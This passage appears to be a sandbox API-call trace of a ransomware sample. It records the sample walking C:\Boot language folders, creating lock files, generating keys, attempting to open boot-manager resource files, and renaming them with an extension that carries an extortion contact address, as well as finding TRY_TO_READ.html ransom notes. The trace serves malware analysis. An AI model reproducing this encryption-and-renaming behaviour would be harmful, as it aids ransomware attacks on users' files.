RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d098 [0065.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666e8 [0065.457] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.457] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.457] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.457] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.457] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d098 | out: pbBuffer=0x48d098) returned 1 [0065.457] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666e8 | out: pbBuffer=0x4666e8) returned 1 [0065.457] SetFileAttributesW (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.457] lstrlenW (lpString="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned 30 [0065.457] GetProcessHeap () returned 0x410000 [0065.457] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.457] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" [0065.457] lstrcatW (in: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.457] GetProcessHeap () returned 0x410000 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.458] CloseHandle (hObject=0xffffffff) returned 0 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.458] FindNextFileW (in: hFindFile=0x48e4f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.458] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.458] GetLastError () returned 0x6 [0065.458] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.458] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.458] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.458] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.458] FindNextFileW (in: hFindFile=0x48e4f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.458] CloseHandle (hObject=0x3cc) returned 1 [0065.458] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.458] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x60)) [0065.458] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.459] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.459] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.459] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\pl-PL9c354ca09c354b444c.lock") returned 37 [0065.459] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL9c354ca09c354b444c.lock" (normalized: "c:\\boot\\pl-pl9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.459] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.459] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.459] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.459] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf68 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf90 | out: hHeap=0x410000) returned 1 [0065.460] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pl-PL\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e530 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.460] GetLastError () returned 0x0 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf68 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e570 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e570 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf68 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.460] FindNextFileW (in: hFindFile=0x48e530, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.460] GetLastError () returned 0x0 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf68 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e570 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e570 | out: hHeap=0x410000) returned 1 [0065.460] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf68 | out: hHeap=0x410000) returned 1 [0065.460] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.461] FindNextFileW (in: hFindFile=0x48e530, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.461] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.461] GetLastError () returned 0x0 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cf68 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.461] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.461] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.461] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cf68 | out: hHeap=0x410000) returned 1 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d1a0 [0065.461] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666f8 [0065.461] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.461] CreateFileW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.461] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.462] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d1a0 | out: pbBuffer=0x48d1a0) returned 1 [0065.462] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666f8 | out: pbBuffer=0x4666f8) returned 1 [0065.462] SetFileAttributesW (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.462] lstrlenW (lpString="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned 30 [0065.462] GetProcessHeap () returned 0x410000 [0065.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.462] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" [0065.462] lstrcatW (in: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.462] GetProcessHeap () returned 0x410000 [0065.462] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.462] CloseHandle (hObject=0xffffffff) returned 0 [0065.462] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.462] FindNextFileW (in: hFindFile=0x48e530, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.462] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.462] GetLastError () returned 0x6 [0065.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.463] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.463] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.463] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.463] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.463] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.463] FindNextFileW (in: hFindFile=0x48e530, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30994ad0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.463] CloseHandle (hObject=0x3cc) returned 1 [0065.463] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.463] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x70)) [0065.463] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.463] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.463] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.464] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\pt-BR9c354ca09c354b444c.lock") returned 37 [0065.464] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR9c354ca09c354b444c.lock" (normalized: "c:\\boot\\pt-br9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.464] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.464] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.464] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.464] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.464] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0065.464] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfe0 | out: hHeap=0x410000) returned 1 [0065.464] FindFirstFileW (in: lpFileName="C:\\\\Boot\\pt-BR\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e570 [0065.464] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.465] GetLastError () returned 0x0 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfb8 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e5b0 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e5b0 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.465] FindNextFileW (in: hFindFile=0x48e570, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30994ad0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30994ad0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.465] GetLastError () returned 0x0 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfb8 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e5b0 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e5b0 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.465] FindNextFileW (in: hFindFile=0x48e570, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.465] GetLastError () returned 0x0 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cfb8 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.465] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.465] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cfb8 | out: hHeap=0x410000) returned 1 [0065.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48d2a8 [0065.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466708 [0065.466] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.466] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.466] CreateFileW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.466] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.466] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48d2a8 | out: pbBuffer=0x48d2a8) returned 1 [0065.466] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466708 | out: pbBuffer=0x466708) returned 1 [0065.466] SetFileAttributesW (lpFileName="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.466] lstrlenW (lpString="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0065.466] GetProcessHeap () returned 0x410000 [0065.466] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.466] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui" [0065.466] lstrcatW (in: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\pt-BR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.466] GetProcessHeap () returned 0x410000 [0065.466] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.466] CloseHandle (hObject=0xffffffff) returned 0 [0065.467] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: 